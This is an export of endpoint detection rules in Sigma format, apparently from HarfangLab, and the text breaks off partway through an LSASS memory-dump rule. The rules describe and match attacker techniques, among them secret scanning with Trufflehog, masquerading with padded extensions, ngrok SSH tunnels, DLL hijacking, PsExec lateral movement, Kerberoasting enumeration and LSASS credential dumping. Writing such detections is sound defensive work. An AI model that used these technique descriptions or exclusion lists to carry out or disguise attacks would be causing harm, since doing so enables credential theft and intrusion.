"rule_description": "Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\nThis tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\nThe Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\nIt is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-11-26",
"rule_modified_date": "2025-11-27",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1213",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69e19e89-cfed-45d8-a058-15df7559165b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086584Z",
"creation_date": "2026-03-23T11:45:34.086586Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086590Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_executable_with_spaces_before_extension.yml",
"content": "title: File with White Spaces Before its Extension Executed\nid: 69e19e89-cfed-45d8-a058-15df7559165b\ndescription: |\n Detects the execution of a suspicious file with a large number of white spaces before its extension.\n This is usually used to hide the file extension by pushing it outside of a default view in a files list window, so that a targeted user is tricked into opening an executable file.\n This technique is often leveraged to better masquerade an executable file as a document (eg. executable icon is set to the one of a PDF file, and/or a '.pdf' double file extension is added before several spaces and '.exe').\n It is recommended to check the binary for malicious content.\nreferences:\n - https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2021/05/04\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|re: '[\\s\\u2800]{5,260}\\.\\w{1,3}$'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69e19e89-cfed-45d8-a058-15df7559165b",
"rule_name": "File with White Spaces Before its Extension Executed",
"rule_description": "Detects the execution of a suspicious file with a large number of white spaces before its extension.\nThis is usually used to hide the file extension by pushing it outside of a default view in a files list window, so that a targeted user is tricked into opening an executable file.\nThis technique is often leveraged to better masquerade an executable file as a document (eg. executable icon is set to the one of a PDF file, and/or a '.pdf' double file extension is added before several spaces and '.exe').\nIt is recommended to check the binary for malicious content.\n",
"rule_creation_date": "2021-05-04",
"rule_modified_date": "2025-02-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a020cdc-4611-49dd-a63a-88e40f6579fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094346Z",
"creation_date": "2026-03-23T11:45:34.094349Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094353Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/hakluke/status/1679023050526687244",
"https://twitter.com/malmoeb/status/1519710302820089857",
"https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/software/S0508/"
],
"name": "t1090_macos_ngrok_ssh.yml",
"content": "title: Ngrok Tunnel via SSH\nid: 6a020cdc-4611-49dd-a63a-88e40f6579fc\ndescription: |\n Detects an SSH command-line with the official Ngrok Tunnel Server URL.\n Ngrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\n It isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\n It is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\nreferences:\n - https://twitter.com/hakluke/status/1679023050526687244\n - https://twitter.com/malmoeb/status/1519710302820089857\n - https://www.huntress.com/blog/abusing-ngrok-hackers-at-the-end-of-the-tunnel\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/software/S0508/\ndate: 2023/07/13\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - attack.s0508\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Tunneling\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/ssh'\n CommandLine|contains:\n - 'tunnel.??.ngrok.com'\n - 'tunnel.ngrok.com'\n - '.ngrok-agent.com'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a020cdc-4611-49dd-a63a-88e40f6579fc",
"rule_name": "Ngrok Tunnel via SSH",
"rule_description": "Detects an SSH command-line with the official Ngrok Tunnel Server URL.\nNgrok is a tool that allows users to expose their local servers to the internet, which enables attackers to tunnel malicious traffic through an otherwise secure network.\nIt isn't necessary to download the Ngrok binary to use an Ngrok tunnel, this can be done by creating a reverse SSH tunnel to the Ngrok servers.\nIt is recommended to identify the binary making the connection, the protocol used by the tunnel, the concerned users and what resources the attacker could have accessed through the tunnel.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a1f9a20-f7c5-4819-915d-773afed71b8a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607610Z",
"creation_date": "2026-03-23T11:45:34.607613Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607621Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/Aladdin/tree/main",
"https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_addinprocess_exploit_named_pipe.yml",
"content": "title: AddInProcess.exe Code Execution Named Pipe Detected\nid: 6a1f9a20-f7c5-4819-915d-773afed71b8a\ndescription: |\n Detects the connection to the '32a91b0f-30cd-4c75-be79-ccbd6345de99' named pipe.\n This can be the result of attackers exploiting the 'AddInProcess.exe' .NET binary to execute code under legitimate processes to hide their traces.\n It is recommended to investigate the children of the process with the PID contained in the command-line or the 'AddInProcess.exe' process as well as the process that connected to the named pipe.\nreferences:\n - https://github.com/nettitude/Aladdin/tree/main\n - https://www.tiraniddo.dev/2017/07/dg-on-windows-10-s-executing-arbitrary.html\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/09/05\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\32a91b0f-30cd-4c75-be79-ccbd6345de99'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a1f9a20-f7c5-4819-915d-773afed71b8a",
"rule_name": "AddInProcess.exe Code Execution Named Pipe Detected",
"rule_description": "Detects the connection to the '32a91b0f-30cd-4c75-be79-ccbd6345de99' named pipe.\nThis can be the result of attackers exploiting the 'AddInProcess.exe' .NET binary to execute code under legitimate processes to hide their traces.\nIt is recommended to investigate the children of the process with the PID contained in the command-line or the 'AddInProcess.exe' process as well as the process that connected to the named pipe.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a5b2e92-4ae7-429a-a460-e0b6432c749f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081219Z",
"creation_date": "2026-03-23T11:45:34.081221Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081225Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_esentutl.yml",
"content": "title: DLL Hijacking via esentutl.exe\nid: 6a5b2e92-4ae7-429a-a460-e0b6432c749f\ndescription: |\n Detects potential Windows DLL Hijacking via esentutl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'esentutl.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ESENT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a5b2e92-4ae7-429a-a460-e0b6432c749f",
"rule_name": "DLL Hijacking via esentutl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via esentutl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a7426b7-86a4-4009-b5d8-bd78413a67e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072697Z",
"creation_date": "2026-03-23T11:45:34.072699Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072703Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec",
"https://thedfirreport.com/2022/04/25/quantum-ransomware/",
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1036_execute_psexec.yml",
"content": "title: PsExec-like Process Executed\nid: 6a7426b7-86a4-4009-b5d8-bd78413a67e9\ndescription: |\n Detects the execution of PsExec-like processes, including PsExec itself and similar tools.\n This detection looks for the execution of known PsExec-related executables and their variants, such as psexec.exe, psexec64.exe, winexesvc.exe, and PAExec.\n It also considers the original filenames and parent processes associated with these tools.\n Attackers often use PsExec and similar utilities for lateral movement within a network, leveraging administrative shares.\n This rule helps identify potential unauthorized use of these tools, which could indicate malicious activity.\n Note that legitimate administrative activities may also trigger this detection, so context is important for investigation.\n It is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\n If this activity is recurrent in your environment, it is highly recommended to whitelist the scripts used in your command-line field.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/lateral-movement-with-psexec\n - https://thedfirreport.com/2022/04/25/quantum-ransomware/\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2020/10/12\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - attack.defense_evasion\n - attack.t1036\n - attack.persistence\n - attack.t1136.002\n - attack.lateral_movement\n - attack.t1570\n - attack.t1021.002\n - attack.s0029\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.PsExec\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_client:\n - Image|endswith:\n - '\\psexec.exe'\n - '\\psexec64.exe'\n - OriginalFileName:\n - 'psexec.exe'\n - 'psexec.c' # since 2016 versions\n # - 'psexesvc.exe' # PSExec service executable. (cannot match on parent process)\n - 'PAExec.exe' # PAExec: https://www.poweradmin.com/paexec/\n\n selection_server:\n - ParentImage|endswith:\n - '\\winexesvc.exe'\n - '\\psexesvc.exe'\n # C:\\Windows\\PAExec-1768-VM-SSI-01.exe / C:\\Windows\\PAExec-2828-S21073.exe ==> \\paexec-PID-hostname.exe\n - '\\PAExec-*-*.exe'\n - ProcessParentOriginalFileName:\n - 'winexesvc.exe'\n - 'psexesvc.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n exclusion_connexionok:\n CommandLine: 'cmd /C echo ConnexionOK'\n\n # https://coservit.com/servicenav/fr/accueil/\n exclusion_servicenav:\n CommandLine|startswith: 'cmd /C echo >NUL | ?:\\WINDOWS\\system32\\windowspowershell\\v1.0\\powershell.exe -command '\n\n exclusion_magellan:\n ParentImage: '?:\\Program Files\\OpenText\\Magellan-*\\integration-center\\GenExec.exe'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a7426b7-86a4-4009-b5d8-bd78413a67e9",
"rule_name": "PsExec-like Process Executed",
"rule_description": "Detects the execution of PsExec-like processes, including PsExec itself and similar tools.\nThis detection looks for the execution of known PsExec-related executables and their variants, such as psexec.exe, psexec64.exe, winexesvc.exe, and PAExec.\nIt also considers the original filenames and parent processes associated with these tools.\nAttackers often use PsExec and similar utilities for lateral movement within a network, leveraging administrative shares.\nThis rule helps identify potential unauthorized use of these tools, which could indicate malicious activity.\nNote that legitimate administrative activities may also trigger this detection, so context is important for investigation.\nIt is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\nIf this activity is recurrent in your environment, it is highly recommended to whitelist the scripts used in your command-line field.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1036",
"attack.t1136.002",
"attack.t1569.002",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6a951ef9-9390-4a9a-9757-ee1fe91b679c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093911Z",
"creation_date": "2026-03-23T11:45:34.093913Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093918Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md#atomic-test-3---extract-all-accounts-in-use-as-spn-using-setspn",
"https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1558_003_enumerate_spn_via_setspn.yml",
"content": "title: Suspicious SPNs Enumeration via setspn\nid: 6a951ef9-9390-4a9a-9757-ee1fe91b679c\ndescription: |\n Detects the suspicious execution of the legitimate windows tool setspn.\n This tool can be used to extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\n Service Principal Names are used to uniquely identify each instance of a Windows service.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731241(v=ws.11)\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md#atomic-test-3---extract-all-accounts-in-use-as-spn-using-setspn\n - https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2022/08/17\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\setspn.exe'\n - OriginalFileName: 'setspn.exe'\n selection_2:\n CommandLine|contains:\n - '-Q'\n - '/Q'\n\n exclusion_azuread:\n - ParentImage:\n - '?:\\Program Files\\Azure Ad Connect Health Adfs Agent\\Diagnostics\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n - '?:\\Program Files (x86)\\Azure Ad Connect Health Adfs Agent\\Diagnostics\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n - GrandparentImage: '?:\\Program Files\\Microsoft Azure AD Connect Health Agent\\Microsoft.Identity.Health.AgentV??.Service.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Legitimate administrator action\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6a951ef9-9390-4a9a-9757-ee1fe91b679c",
"rule_name": "Suspicious SPNs Enumeration via setspn",
"rule_description": "Detects the suspicious execution of the legitimate windows tool setspn.\nThis tool can be used to extract the Service Principal Names (SPNs) used in Active Directory to conduct attacks such as Kerberoasting.\nService Principal Names are used to uniquely identify each instance of a Windows service.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ab64fdc-5e5d-466b-acb8-d33de7ac703a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628667Z",
"creation_date": "2026-03-23T11:45:34.628669Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628673Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/",
"https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_minidump.yml",
"content": "title: LSASS Process Memory Dumped via MiniDump API\nid: 6ab64fdc-5e5d-466b-acb8-d33de7ac703a\ndescription: |\n Detects an attempt to open LSASS.exe process memory with read permissions to perform a minidump (using MiniDumpWriteDump located in dbghelp.dll / dbgcore.dll or Minidump located in comsvcs.dll).\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to investigate the process that performed this action to determine its legitimacy, to look for the unwanted usage of stolen credentials on others hosts (e.g via Path-the-Hash) as well as to look for other suspicious actions on the host.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Comsvcs/\n - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/06/02\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n CallTrace|contains:\n - 'dbgcore.dll'\n - 'dbghelp.dll'\n - 'comsvcs.dll'\n\n # This is handled by the rule 3ed4eb53-d0ba-458c-9c03-cd4f967cc00b\n filter_procdump:\n ProcessOriginalFileName: 'procdump'\n\n # taskkill /FI MODULES eq JeepJava.dll\n exclusion_taskkill:\n ProcessInternalName: 'taskkill.exe'\n ProcessOriginalFileName: 'taskkill.exe'\n ProcessSigned: 'true'\n ProcessCommandLine|contains|all:\n - '/FI '\n - ' MODULES '\n\n # \"C:\\Windows\\system32\\tasklist.exe\" /M LenovoBatteryGaugePackage.dll\n exclusion_tasklist:\n ProcessInternalName: 'tasklist.exe'\n ProcessOriginalFileName: 'tasklist.exe'\n ProcessSigned: 'true'\n ProcessCommandLine|contains: '/M'\n\n exclusion_symantec:\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n CallTrace|contains: 'Symantec Endpoint Protection'\n\n exclusion_werfault1:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\Faultrep.dll'\n - '?:\\Windows\\System32\\WerFault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n ProcessParentImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_werfault2:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\werui.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains:\n - ' -pr Global' # C:\\WINDOWS\\system32\\werfault.exe -pr Global\\AF13DBAAA32678FB\n - ' -p'\n - ' /h /shared Global' # werfault.exe /h /shared Global\\f7f93a4b90f948a58adbbe4165656106 /t 10092 /p 8712\n ProcessParentCommandLine: '?:\\WINDOWS\\System32\\svchost.exe -k WerSvcGroup'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_werfault3:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\SysWOW64\\wer.dll'\n - '?:\\Windows\\SysWOW64\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n\n exclusion_werfault4:\n SourceImage: '*\\WerFault.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\SysWOW64\\dbgcore.dll'\n - '?:\\Windows\\SysWOW64\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessCommandLine|contains: ' -u -p '\n\n exclusion_werfaultsecure:\n SourceImage: '*\\WerFaultSecure.exe'\n CallTrace|contains|all:\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - 